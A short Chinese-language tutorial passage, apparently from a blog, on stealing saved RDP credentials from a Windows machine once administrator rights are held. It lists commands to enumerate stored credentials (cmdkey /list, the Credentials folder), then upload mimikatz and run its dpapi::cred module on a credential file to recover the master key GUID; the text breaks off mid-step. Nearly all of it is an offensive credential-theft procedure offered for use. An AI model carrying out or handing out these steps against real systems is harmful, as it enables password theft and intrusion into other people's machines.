當我們拿到了機器的管理員權限後,想獲取其RDP憑據保存的密碼。那麼,該如何操作呢?
首先,執行以下命令查看目標機器是否存在RDP憑據
#查看mstsc的連接紀錄
cmdkey /list
#查找本地的Credentials:
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
存在的話,上傳mimikatz,執行以下命令,記錄 guidMasterKey 值
mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\19DC8328D3873E6AB8EF6B081B771D2E"
執行以下值,找到 guidMasterKey 值 對應的 MasterKey。上面的guidMa